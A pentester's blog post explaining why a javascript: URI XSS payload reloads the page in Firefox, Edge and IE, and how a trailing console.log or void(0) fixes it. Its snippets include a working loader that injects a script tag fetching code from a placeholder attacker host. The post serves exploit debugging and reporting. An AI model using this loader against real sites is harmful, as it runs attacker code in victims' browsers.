Fri 14th June 19
I was recently contacted by Ryan Dewhurst
to help him with an XSS issue he was having problems with. Ryan knows his stuff, and if he was having problems with something, I knew it had to be a fun challenge.
XSS could easily be proved by injecting an alert which triggered when the link was clicked:
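The original snippet isn't reproduced here, but a click-triggered proof via a `javascript:` URI typically looks like the sketch below; the injection point and the `document.domain` argument are assumptions for illustration:

```javascript
// Hypothetical reconstruction of the click-to-trigger proof: the injected
// value lands in a link's href, so the alert only fires on click.
// In the page it would render as:
//   <a href="javascript:alert(document.domain)">Click me</a>
const pocHref = "javascript:alert(document.domain)";
console.log(pocHref);
```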
But when he tried to inject the following fairly standard code to add a new script tag to the DOM, he came across some issues.
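The snippet itself is missing from the post; a fairly standard script-tag injector looks like the sketch below. The URL is a placeholder, and the tiny `document` stub exists only so the sketch runs outside a browser:

```javascript
// Stand-in for the real DOM so this runs outside a browser; in the attack,
// `document` is the victim page's document object.
const document = {
  createElement: (tag) => ({ tagName: tag.toUpperCase(), src: "" }),
  body: { appendChild: (node) => node }, // like the real API, returns the node
};

// The injected payload: create a script tag pointing at an external file
// and attach it to the page so the browser fetches and runs it.
const s = document.createElement("script");
s.src = "https://attacker.example/payload.js"; // placeholder URL
const returned = document.body.appendChild(s);

// Note the return value: appendChild hands back the element it inserted.
console.log(returned === s); // true
```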
The code worked fine on his test site (you all test your exploits locally before dropping them on a client site, right?): the external JS file was loaded and the code ran successfully. But when it was dropped into the client environment, rather than the external file being loaded, the page refreshed and showed the following content:
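The post doesn't reproduce the replacement content, but when Firefox navigates a `javascript:` URI whose final value isn't undefined, it renders the value's string form, which for a script element would likely be `[object HTMLScriptElement]`. A minimal sketch of that default string conversion, using a tagged plain object in place of a real DOM element:

```javascript
// An object tagged the way DOM script elements are; its default string
// conversion matches what the browser would show in place of the page.
const fakeScript = { [Symbol.toStringTag]: "HTMLScriptElement" };
console.log(String(fakeScript)); // "[object HTMLScriptElement]"
```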
I didn’t have access to the client site but was able to confirm that the sample code worked correctly for me, and we both sat and scratched our heads. I was in the middle of writing a report, so the test I’d done was in Chrome, which I use as my main browser. To help with debugging, I brought up my testing environment of Firefox, Burp and a few other bits, and tried again with the test code. At this point the test code failed and I got the same response Ryan was getting from the client site. I asked Ryan what browser he was using; he said Firefox to access the client but, same as me, he had looked at the sample code in Chrome. When he tried running the exploit against the client site in Chrome, it worked as expected: the JS was loaded and ran fine.
After a bit of debugging, we found that by adding an alert or a console.log on to the end of the exploit code, it could be made to work in both Firefox and Chrome:
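The fixed payload isn't shown in the post; the idea is simply to tack a call that returns undefined onto the end of the injected code. A sketch, with a placeholder URL, built as the `href` string it would be injected as:

```javascript
// Same loader with a trailing log. console.log (and alert) return undefined,
// so when one of them is the last statement the javascript: URI evaluates to
// undefined and the browser leaves the page alone.
const href = "javascript:" +
  'var s = document.createElement("script");' +
  's.src = "https://attacker.example/payload.js";' + // placeholder URL
  'document.body.appendChild(s);' +
  'console.log("loaded");';

// The key property the trailing call relies on:
console.log(console.log("loaded") === undefined); // true
```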
Another option is to append void(0) as a way to kill the return value. Swapping that in for the log command in this example worked and had the additional benefit of not writing anything extra to the console.
Based on the brief reading I did on the topic, the browser's reaction is based on what is returned by the last statement run. Both alert() and console.log() return undefined, which tells the browser not to react to the link, whereas appendChild() returns the element which was added to the DOM, which is not undefined, so the browser replaces the page with that value's string form.
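This completion-value behaviour can be simulated without a browser using eval, which also yields the value of the last statement evaluated. The object below stands in for the script element appendChild would return:

```javascript
// A stand-in for the script element that appendChild returns.
const fakeScript = { toString: () => "[object HTMLScriptElement]" };

// Last statement evaluates to the element: NOT undefined, so the browser
// would replace the page with its string form.
const bare = eval("fakeScript;");
console.log(bare === undefined); // false

// Appending void(0) (or a console.log) makes the completion value undefined,
// so the browser takes no further action.
const guarded = eval("fakeScript; void(0);");
console.log(guarded === undefined); // true
```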
Out of curiosity, I also tried the test code in Edge and IE. I initially got some mixed results, with both showing signs of working with and without the trailing command, but after clearing caches and starting from a clean slate, both appeared to work in the same way as Firefox and to require the trailing command.
If you want to check this out, I’ve set up two demonstrations on JSFiddle:
Before anyone jumps in shouting "I’d have exploited it a different way", or, "This way is better…": when this failed, both Ryan and I wanted to know why. Yes, there are lots of other ways this could have been exploited, but learning why something is failing is a really useful exercise, and practising debugging things like this when they come up helps improve those core skills.
As well as pointing out this specific quirk, I want this post to highlight the different behaviours between browsers, all of which are supposed to implement the same standard. If you are developing a proof of concept, make sure you test it out in as many different environments as possible and comment on the findings in your report. You don’t want to spend ages putting together an amazing demo of an exploit only to find that while it worked perfectly for you in Chrome, it didn’t work for the client when they looked at it in Edge.
Similarly, you might feel that a vulnerability deserves a different risk rating if browser support is not universal; a vulnerability which can only be exploited in Firefox may not be a serious risk to a client who has enforced rules requiring staff to use only IE.
Finally, if something doesn’t work for you the first time, or doesn’t work quite as you would expect, look into why if you have the time. Spend some time debugging and trying to understand the problem; the few minutes spent today may save you hours on a future test.